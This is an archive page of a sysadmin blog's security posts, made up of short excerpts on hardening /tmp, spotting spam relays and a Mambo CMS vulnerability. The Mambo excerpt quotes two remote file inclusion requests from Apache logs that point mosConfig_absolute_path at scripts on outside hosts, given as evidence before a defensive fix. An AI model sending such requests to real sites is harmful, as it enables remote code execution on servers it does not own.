Archive for the ‘Security’ Category

« Previous Entries

Mambo mosConfig_absolute_path exploit & solution

Wednesday, December 16th, 2009

I know that not lots of people use mambo these days, and most of them upgraded to joomla 1.5 but in case you happen to have one hosted in your server, there is a known vulnerability , hack scripts using the mosConfig_absolute_path variable to load malicious code from other webhosts ,and that gives them the ability to run scirpts (you surely dont wont) in your server.

an example is requests like the above in the access files of apache:

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=mosConfig_absolute_path=http://www.rgboy.fi//spreadz.txt??

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=http://forum.redglove.it//c.txt??

securing/hardening the tmp is one thing, but wont do the job, the rules of the latest Mod Security are not easy at all to write , you have to be good in regular expressions.

What did the trick in my case is re-write rules. (more…)

Posted in Apache, php, Security | No Comments »

/tmp & /var/tmp noexec hardening without reboot

Saturday, November 28th, 2009

After discovering scripts running in my /tmp folder (in CentOS 5.x) I had to harden the directory.

The faster way to harden your /tmp and /var/tmp without rebooting is the following:

In your /dev directory create an empty 2,5 GB file (best for web hosting servers with many websites).

# cd /dev
# dd if=/dev/zero of=tmppart bs=1024 count=2500000

We will now create an ext3 filesystem for in our tmppart file.
(more…)

Posted in Security, Unix/Linux Various | No Comments »

xinetd[#]: Deactivating service smtp due to excessive incoming connections. Restarting in 30 seconds.

Thursday, November 15th, 2007

This happened to a Plesk 8.x Linux (RH) server, the problem was that smtp service was up and running, and the queue was very light , but smtp wouldn’t accept any connections at port 25 even from localhost.

In the /var/log/messages I saw this disturbing message:
xinetd[#]: Deactivating service smtp due to excessive incoming connections. Restarting in 30 seconds.

(more…)

Posted in Mail Server, Security, Unix/Linux Various | No Comments »

How to check if some one is spamming from my server (Linux Plesk 8.x)

Tuesday, November 13th, 2007

If you see a lot of smtp connections or your server gets constantly in spam black lists, maybe you should check if some bot spams through your server.

The are 2 cases of spamming through a box:

1)using unsecure php forms that bots abuse
2)using smtp connection from an outside client

this artice is about the 2nd case,

(more…)

Posted in Mail Server, Security, Unix/Linux Various | No Comments »

Get notified when root logs in.

Monday, October 29th, 2007

edit the file /root/.bashrc and add the following lines: (more…)

Posted in Security, Unix/Linux Various | No Comments »

How do I mount /tmp partition with ‘noexec’ option.

Tuesday, June 12th, 2007

It is recommended to create /tmp as separate partition and mount it with ‘noexec’ and ‘nosuid’ options.

(more…)

Posted in Security, Unix/Linux Various | No Comments »

« Previous Entries